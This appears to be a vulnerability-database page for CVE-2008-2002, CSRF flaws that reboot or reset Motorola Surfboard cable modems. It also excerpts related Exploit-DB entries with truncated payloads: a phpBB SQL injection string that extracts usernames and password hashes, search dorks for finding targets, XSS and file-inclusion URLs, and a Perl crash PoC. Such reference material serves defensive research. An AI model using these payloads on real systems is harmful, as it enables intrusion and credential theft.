CVE-2008-2002
published 2008-04-28CVE-2008-2002: Multiple cross-site request forgery (CSRF) vulnerabilities on Motorola Surfboard with software SB5100-2.3.3.0-SCM00-NOSH allow remote attackers to (1) cause a…
PriorityP428high7.8CVSS 2.0
AVNACMAuNCNIPAC
EPSS
1.46%
70.3th percentile
Multiple cross-site request forgery (CSRF) vulnerabilities on Motorola Surfboard with software SB5100-2.3.3.0-SCM00-NOSH allow remote attackers to (1) cause a denial of service (device reboot) via the "Restart Cable Modem" value in the BUTTON_INPUT parameter to configdata.html, and (2) cause a denial of service (hard reset) via the "Reset All Defaults" value in the BUTTON_INPUT parameter to configdata.html.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| motorola | surfboard | — | — |
CVSS provenance
nvdv2.07.8HIGHAV:N/AC:M/Au:N/C:N/I:P/A:C
vendor_redhat10.0CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c6xr-3cp2-f7f7: Multiple cross-site request forgery (CSRF) vulnerabilities on Motorola Surfboard with software SB5100-2
ghsa_unreviewed·2022-05-01
CVE-2008-2002 [HIGH] CWE-352 GHSA-c6xr-3cp2-f7f7: Multiple cross-site request forgery (CSRF) vulnerabilities on Motorola Surfboard with software SB5100-2
Multiple cross-site request forgery (CSRF) vulnerabilities on Motorola Surfboard with software SB5100-2.3.3.0-SCM00-NOSH allow remote attackers to (1) cause a denial of service (device reboot) via the "Restart Cable Modem" value in the BUTTON_INPUT parameter to configdata.html, and (2) cause a denial of service (hard reset) via the "Reset All Defaults" value in the BUTTON_INPUT parameter to configdata.html.
GHSA
Apache Tomcat Leaks Information via Error Message
ghsa·2022-04-30
CVE-2002-2008 [MEDIUM] CWE-209 Apache Tomcat Leaks Information via Error Message
Apache Tomcat Leaks Information via Error Message
Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
Red Hat
uw-imap: buffer overflow in dmail and tmail
vendor_redhat·2008-10-31·CVSS 10.0
CVE-2008-5005 [CRITICAL] uw-imap: buffer overflow in dmail and tmail
uw-imap: buffer overflow in dmail and tmail
Multiple stack-based buffer overflows in (1) University of Washington IMAP Toolkit 2002 through 2007c, (2) University of Washington Alpine 2.00 and earlier, and (3) Panda IMAP allow (a) local users to gain privileges by specifying a long folder extension argument on the command line to the tmail or dmail program; and (b) remote attackers to execute arbitrary code by sending e-mail to a destination mailbox name composed of a username and '+' character followed by a long string, processed by the tmail or possibly dmail program.
No detection rules found.
Exploit-DB
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
exploitdb·2015-09-06
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
---
# Exploit Title: [ActiveState] Perl.exe x64 Client Denial of Service (v5.20.2)
# Date: 9-3-2015
# Software Link: http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.20.2.2002/ActivePerl-5.20.2.2002-MSWin32-x64-299195.msi
# Exploit Author: Robbie Corley
# Contact: [email protected]
# Website:
# Target(s): Windows 7, Server 2008, server 2012, Windows 8.1, Windows 10
# CVE:
# Category: Denial of Service Exploits
#
# Description:
# A Denial of Service can be achieved by concatenating several large strings together and attempting to write to file.
my $buff = "\x41" x 7000;
my $endofbuff = "\x42" x 5860;
open(myfile,'>orgsched.ocf'); # file extension is irrelevant
pri
Exploit-DB
Nuked-klaN SP4 - Remote File Inclusion
exploitdb·2009-12-26
Nuked-klaN SP4 - Remote File Inclusion
Nuked-klaN SP4 - Remote File Inclusion
---
======================================================================================== $
| # Title : Nuked-Klan SP4 RFI Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # DAte :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : Powered by Nuked-Klan SP4 � 2002, 2008 /http://www.nuked-klan.org |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) |
| # Bug : RFI |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://localhost/nuked/modules/Search/index.php?mod=[EV!L
Exploit-DB
Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption
exploitdb·2008-06-17
CVE-2008-2752 Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption
Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption
---
source: https://www.securityfocus.com/bid/29769/info
Microsoft Word is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open and interact with malicious Word files.
Successfully exploiting this issue will corrupt memory and crash the application. Given the nature of this issue, attackers may also be able to execute arbitrary code in the context of the currently logged-in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-1.doc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-2.doc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934
Exploit-DB
DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2008-04-02
CVE-2008-1800 DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities
DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/28566/info
DivXDB 2002 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DivXDB 2002 0.94b is vulnerable; other versions may also be affected.
http://www.example.com/index.php?choice=">alert("CANAKKALE-GECiLMEZ") http://www.example.com/index.php?choice=14&_page_=">alert("CANAKKALE-GECiLMEZ")&year_inf=1998&year_sup=2008 http://www.example.com/index.php?_page_="
Exploit-DB
Fully Modded phpBB - 'kb.php' SQL Injection
exploitdb·2008-03-12
CVE-2008-1350 Fully Modded phpBB - 'kb.php' SQL Injection
Fully Modded phpBB - 'kb.php' SQL Injection
---
# Powered by phpBB © 2001, 2006 phpBB Group
# Modified by Fully Modded phpBB © 2002, 2006
#
#########################################################################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORKS 1 : allinurl :kb.php?mode=article&k
# DORKS 2 : article&k=
# DORKS 3 : "Powered by phpBB © 2001, 2006 phpBB Group" "Modified by Fully Modded phpBB © 2002, 2006"
#
##########################################################################
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
#####
No writeups or analysis indexed.
http://secunia.com/advisories/30026http://securityreason.com/securityalert/3839http://www.kb.cert.org/vuls/id/643049http://www.rooksecurity.com/blog/?p=4http://www.securityfocus.com/archive/1/491143/100/0/threadedhttp://www.vupen.com/english/advisories/2008/1390/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42091http://secunia.com/advisories/30026http://securityreason.com/securityalert/3839http://www.kb.cert.org/vuls/id/643049http://www.rooksecurity.com/blog/?p=4http://www.securityfocus.com/archive/1/491143/100/0/threadedhttp://www.vupen.com/english/advisories/2008/1390/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42091
2008-04-28
Published